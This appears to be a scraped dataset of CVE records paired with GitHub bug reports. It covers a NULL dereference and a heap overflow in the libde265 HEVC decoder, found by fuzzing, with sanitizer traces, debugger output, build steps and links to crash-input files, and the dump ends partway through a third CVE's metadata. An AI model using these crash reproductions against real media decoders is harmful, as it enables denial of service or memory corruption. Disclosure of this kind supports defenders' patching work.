2023-02-24T14:08:21Z
2023-02-24T14:16:23Z
https://github.com/Cherry-toto/jizhicms/issues/85
1,598,705,544
85
4,836
CVE-2023-27102
2023-03-15T15:15:09.617
Libde265 v1.0.11 was discovered to contain a segmentation violation via the function decoder_context::process_slice_segment_header at decctx.cc.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/393" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00032.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/393" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00032.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.11:*:*:*:*:*:*:*", "matchCriteriaId": "75BAF096-8BC3-4430-930C-8F3E6266C21D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/strukturag/libde265/issues/393
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
### Desctiption A SEGV has occurred when running program dec265 NULL Pointer Dereference in function decoder_context::process_slice_segment_header at decctx.cc:2007:20 ### Version ``` dec265 v1.0.11 git log commit fef32a7761993702c699dfbe3699e44374eb44b5 (HEAD -> master, origin/master, origin/HEAD) Merge: 3aea5a45 c2b60f1c Author: Dirk Farin <dirk.farin@gmail.com> Date: Thu Feb 9 11:13:24 2023 +0100 ``` ### Steps to reproduce ``` git clone https://github.com/strukturag/libde265.git cd libde265 ./autogen.sh export CFLAGS="-g -O0 -lpthread -fsanitize=address" export CXXFLAGS="-g -O0 -lpthread -fsanitize=address" export LDFLAGS="-fsanitize=address" ./configure --disable-shared make -j cd dec265 ./dec265 SEGV-POC ``` ``` WARNING: non-existing PPS referenced WARNING: maximum number of reference pictures exceeded WARNING: maximum number of reference pictures exceeded WARNING: non-existing PPS referenced WARNING: non-existing PPS referenced WARNING: non-existing PPS referenced WARNING: non-existing PPS referenced AddressSanitizer:DEADLYSIGNAL ================================================================= ==3838968==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004e2220 bp 0x7ffc6cbf5fd0 sp 0x7ffc6cbf5ac0 T0) ==3838968==The signal is caused by a READ memory access. ==3838968==Hint: address points to the zero page. #0 0x4e2220 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:2007:20 #1 0x4e1012 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:649:7 #2 0x4eb7f1 in decoder_context::decode_NAL(NAL_unit*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1240:11 #3 0x4ec6a1 in decoder_context::decode(int*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1328:16 #4 0x4d3645 in de265_decode /home/lzy/fuzz/oss/libde265/libde265/de265.cc:367:15 #5 0x4d0363 in main /home/lzy/fuzz/oss/libde265/dec265/dec265.cc:764:17 #6 0x7efcae0bc082 in __libc_start_main /build/glibc-KZwQYS/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41e5bd in _start (/home/lzy/fuzz/oss/libde265/dec265/dec265+0x41e5bd) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:2007:20 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) ==3838968==ABORTING ``` ### POC [https://github.com/blu3sh0rk/Fuzzing-crash/blob/main/SEGV.zip](url) ### GDB INFO ``` WARNING: maximum number of reference pictures exceeded WARNING: CTB outside of image area (concealing stream error...) WARNING: maximum number of reference pictures exceeded [ Legend: Modified register | Code | Heap | Stack | String ] โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ registers โ”€โ”€โ”€โ”€$rax : 0x0 $rbx : 0x007fffffff3180 โ†’ 0x0061b0000f1494 โ†’ 0x0000000000000000 $rcx : 0x6f2 $rdx : 0x637 $rsp : 0x007fffffff30e0 โ†’ 0x0000000041b58ab3 $rbp : 0x007fffffff35f0 โ†’ 0x007fffffff3970 โ†’ 0x007fffffff3b30 โ†’ 0x007fffffff3ca0 โ†’ 0x007fffffff3cd0 โ†’ 0x007fffffffe0c0 โ†’ 0x0000000000000000 $rsi : 0x600 $rdi : 0x00621000000718 โ†’ 0x0000000000000000 $rip : 0x000000004e2220 โ†’ <decoder_context::process_slice_segment_header(slice_segment_header*,+0> mov al, BYTE PTR [rax] $r8 : 0x00621000000100 โ†’ 0x000000006f97b0 โ†’ 0x000000004db200 โ†’ <decoder_context::~decoder_context()+0> push rbp $r9 : 0x007ffff43ff800 โ†’ 0xbeddbeddddbeddbe $r10 : 0x24b $r11 : 0x240 $r12 : 0x0000000041e590 โ†’ <_start+0> endbr64 $r13 : 0x007fffffffe1b0 โ†’ 0x0000000000000002 $r14 : 0x200 $r15 : 0x0 $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ stack โ”€โ”€โ”€โ”€0x007fffffff30e0โ”‚+0x0000: 0x0000000041b58ab3 โ† $rsp 0x007fffffff30e8โ”‚+0x0008: 0x000000006fac63 โ†’ "4 32 16 7 agg.tmp 64 16 9 agg.tmp36 96 16 9 agg.tm[...]" 0x007fffffff30f0โ”‚+0x0010: 0x000000004e1eb0 โ†’ <decoder_context::process_slice_segment_header(slice_segment_header*,+0> push rbp 0x007fffffff30f8โ”‚+0x0018: 0x006290000b4418 โ†’ 0xbebebe0000000004 0x007fffffff3100โ”‚+0x0020: 0x0061b0000f1534 โ†’ 0x0000000000000000 0x007fffffff3108โ”‚+0x0028: 0x006290000b649c โ†’ 0x00000d00000001 โ†’ 0x0000000000000000 0x007fffffff3110โ”‚+0x0030: 0x0061b0000f14cc โ†’ 0x0000000000000002 0x007fffffff3118โ”‚+0x0038: 0x006290000b649c โ†’ 0x00000d00000001 โ†’ 0x0000000000000000 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ code:x86:64 โ”€โ”€โ”€โ”€ 0x4e220d <decoder_context::process_slice_segment_header(slice_segment_header*,+0> mov rdi, QWORD PTR [rbx+0x320] 0x4e2214 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> call 0x49f990 <__asan_report_load1> 0x4e2219 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> mov rax, QWORD PTR [rbx+0x320] โ†’ 0x4e2220 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> mov al, BYTE PTR [rax] 0x4e2222 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> and al, 0x1 0x4e2224 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> movzx eax, al 0x4e2227 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> cmp eax, 0x0 0x4e222a <decoder_context::process_slice_segment_header(slice_segment_header*,+0> jne 0x4e22aa <decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*)+1018> 0x4e2230 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> mov ecx, DWORD PTR ds:0x75b760 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ source:decctx.cc+2007 โ”€โ”€โ”€โ”€ 2002 2003 2004 // get PPS and SPS for this slice 2005 2006 int pps_id = hdr->slice_pic_parameter_set_id; // pps_id=0x1 โ†’ 2007 if (pps[pps_id]->pps_read==false) { 2008 logerror(LogHeaders, "PPS %d has not been read\n", pps_id); 2009 assert(false); // TODO 2010 } 2011 2012 current_pps = pps[pps_id]; โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ threads โ”€โ”€โ”€โ”€[#0] Id 1, Name: "dec265", stopped 0x4e2220 in decoder_context::process_slice_segment_header (), reason: SIGSEGV โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ trace โ”€โ”€โ”€โ”€[#0] 0x4e2220 โ†’ decoder_context::process_slice_segment_header(this=0x621000000100, hdr=0x61b0000f1180, err=0x7fffffff3630, pts=0xa000, nal_hdr=0x7fffffff39e0, user_data=0x2) [#1] 0x4e1013 โ†’ decoder_context::read_slice_NAL(this=0x621000000100, reader=@0x7fffffff39a0, nal=0x606000020d20, nal_hdr=@0x7fffffff39e0) [#2] 0x4eb7f2 โ†’ decoder_context::decode_NAL(this=0x621000000100, nal=0x606000020d20) [#3] 0x4ec6a2 โ†’ decoder_context::decode(this=0x621000000100, more=0x7fffffffde50) [#4] 0x4d3646 โ†’ de265_decode(de265ctx=0x621000000100, more=0x7fffffffde50) [#5] 0x4d0364 โ†’ main(argc=0x2, argv=0x7fffffffe1b8) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€gefโžค ``` ### Impact Due to incorrect access control, a SEGV caused by a READ memory access occurred at line 2007 of the code. This issue can cause a Denial of Service attack.
SEGV:occured in function decoder_context::process_slice_segment_header at decctx.cc:2007:20
https://api.github.com/repos/strukturag/libde265/issues/393/comments
2
2023-02-20T13:07:39Z
2023-06-13T13:34:07Z
https://github.com/strukturag/libde265/issues/393
1,591,846,415
393
4,837
CVE-2023-27103
2023-03-15T15:15:09.670
Libde265 v1.0.11 was discovered to contain a heap buffer overflow via the function derive_collocated_motion_vectors at motion.cc.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/394" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00032.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/394" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00032.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.11:*:*:*:*:*:*:*", "matchCriteriaId": "75BAF096-8BC3-4430-930C-8F3E6266C21D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/394
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
### Desctiption A heap-buffer-overflow has occurred when running program dec265 in function derive_collocated_motion_vectors at motion.cc:1259:41 ### Version ``` dec265 v1.0.11 git log commit fef32a7761993702c699dfbe3699e44374eb44b5 (HEAD -> master, origin/master, origin/HEAD) Merge: 3aea5a45 c2b60f1c Author: Dirk Farin <dirk.farin@gmail.com> Date: Thu Feb 9 11:13:24 2023 +0100 ``` ### Steps to reproduce ``` git clone https://github.com/strukturag/libde265.git cd libde265 ./autogen.sh export CFLAGS="-g -O0 -lpthread -fsanitize=address" export CXXFLAGS="-g -O0 -lpthread -fsanitize=address" export LDFLAGS="-fsanitize=address" ./configure --disable-shared make -j cd dec265 ./dec265 Heap-overflow-POC1 ``` ``` WARNING: Bit-depth of current image does not match SPS WARNING: Bit-depth of current image does not match SPS WARNING: Too many warnings queued ================================================================= ==137060==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000000a8 at pc 0x0000006cc0b4 bp 0x7fff28554e90 sp 0x7fff28554e88 READ of size 8 at 0x6020000000a8 thread T0 #0 0x6cc0b3 in derive_collocated_motion_vectors(base_context*, de265_image*, slice_segment_header const*, int, int, int, int, int, int, int, MotionVector*, unsigned char*) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:1259:41 #1 0x6cd4cf in derive_temporal_luma_vector_prediction(base_context*, de265_image*, slice_segment_header const*, int, int, int, int, int, int, MotionVector*, unsigned char*) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:1388:5 #2 0x6cf16c in get_merge_candidate_list_without_step_9(base_context*, slice_segment_header const*, MotionVectorAccess const&, de265_image*, int, int, int, int, int, int, int, int, int, PBMotion*) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:1523:5 #3 0x6d052b in derive_luma_motion_merge_mode(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, int, int, PBMotion*) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:1612:3 #4 0x6d80d6 in motion_vectors_and_ref_indices(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int, PBMotion*) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:2088:7 #5 0x6d9435 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:2171:3 #6 0x5bf634 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:4136:3 #7 0x5c233c in read_coding_unit(thread_context*, int, int, int, int) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:4504:9 #8 0x5b17db in read_coding_quadtree(thread_context*, int, int, int, int) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:4652:5 #9 0x5b0887 in read_coding_tree_unit(thread_context*) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:2861:3 #10 0x5c7fe8 in decode_substream(thread_context*, bool, bool) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:4741:5 #11 0x5cb648 in read_slice_segment_data(thread_context*) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:5054:14 #12 0x4e8254 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:853:7 #13 0x4e614f in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:955:11 #14 0x4e4b1f in decoder_context::decode_some(bool*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:740:13 #15 0x4e1a3f in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:698:9 #16 0x4eb7f1 in decoder_context::decode_NAL(NAL_unit*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1240:11 #17 0x4ec6a1 in decoder_context::decode(int*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1328:16 #18 0x4d3645 in de265_decode /home/lzy/fuzz/oss/libde265/libde265/de265.cc:367:15 #19 0x4d0363 in main /home/lzy/fuzz/oss/libde265/dec265/dec265.cc:764:17 #20 0x7fccbc3e8082 in __libc_start_main /build/glibc-KZwQYS/glibc-2.31/csu/../csu/libc-start.c:308:16 #21 0x41e5bd in _start (/home/lzy/fuzz/oss/libde265/dec265/dec265+0x41e5bd) 0x6020000000a8 is located 16 bytes to the right of 8-byte region [0x602000000090,0x602000000098) allocated by thread T0 here: #0 0x4ca8dd in operator new(unsigned long) (/home/lzy/fuzz/oss/libde265/dec265/dec265+0x4ca8dd) #1 0x500842 in __gnu_cxx::new_allocator<slice_segment_header*>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/ext/new_allocator.h:114:27 #2 0x500751 in std::allocator_traits<std::allocator<slice_segment_header*> >::allocate(std::allocator<slice_segment_header*>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/alloc_traits.h:443:20 #3 0x4ffef1 in std::_Vector_base<slice_segment_header*, std::allocator<slice_segment_header*> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:343:20 #4 0x4ff227 in void std::vector<slice_segment_header*, std::allocator<slice_segment_header*> >::_M_realloc_insert<slice_segment_header* const&>(__gnu_cxx::__normal_iterator<slice_segment_header**, std::vector<slice_segment_header*, std::allocator<slice_segment_header*> > >, slice_segment_header* const&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/vector.tcc:440:33 #5 0x4feea3 in std::vector<slice_segment_header*, std::allocator<slice_segment_header*> >::push_back(slice_segment_header* const&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:1195:4 #6 0x4e4066 in de265_image::add_slice_segment_header(slice_segment_header*) /home/lzy/fuzz/oss/libde265/libde265/../libde265/image.h:326:12 #7 0x4e12ba in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:657:14 #8 0x4eb7f1 in decoder_context::decode_NAL(NAL_unit*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1240:11 #9 0x4ec6a1 in decoder_context::decode(int*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1328:16 #10 0x4d3645 in de265_decode /home/lzy/fuzz/oss/libde265/libde265/de265.cc:367:15 #11 0x4d0363 in main /home/lzy/fuzz/oss/libde265/dec265/dec265.cc:764:17 #12 0x7fccbc3e8082 in __libc_start_main /build/glibc-KZwQYS/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lzy/fuzz/oss/libde265/libde265/motion.cc:1259:41 in derive_collocated_motion_vectors(base_context*, de265_image*, slice_segment_header const*, int, int, int, int, int, int, int, MotionVector*, unsigned char*) Shadow bytes around the buggy address: 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa =>0x0c047fff8010: fa fa 00 fa fa[fa]fd fa fa fa fd fa fa fa fd fa 0x0c047fff8020: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa 0x0c047fff8030: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fa 0x0c047fff8040: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x0c047fff8050: fa fa 04 fa fa fa fd fa fa fa 00 00 fa fa fd fa 0x0c047fff8060: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 04 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==137060==ABORTING ``` ### POC [https://github.com/blu3sh0rk/Fuzzing-crash/blob/main/Heap-overflow-POC1.zip](url) ### Code in function derive_collocated_motion_vectors at motion.cc:1259:41 ``` if (allRefFramesBeforeCurrentFrame) { mvCol = mvi.mv[X]; refIdxCol = mvi.refIdx[X]; listCol = X; } else { int N = shdr->collocated_from_l0_flag; mvCol = mvi.mv[N]; refIdxCol = mvi.refIdx[N]; listCol = N; } } 1259 const slice_segment_header* colShdr = colImg->slices[ colImg->get_SliceHeaderIndex(xColPb,yColPb) ]; ``` ### Impact Potentially causing DoS and RCE
A heap-buffer-overflow has occurred when running program dec265 in function derive_collocated_motion_vectors at motion.cc
https://api.github.com/repos/strukturag/libde265/issues/394/comments
3
2023-02-22T03:28:35Z
2023-04-16T20:29:41Z
https://github.com/strukturag/libde265/issues/394
1,594,397,865
394
4,838
CVE-2023-27781
2023-03-15T15:15:09.733
jpegoptim v1.5.2 was discovered to contain a heap overflow in the optimize function at jpegoptim.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
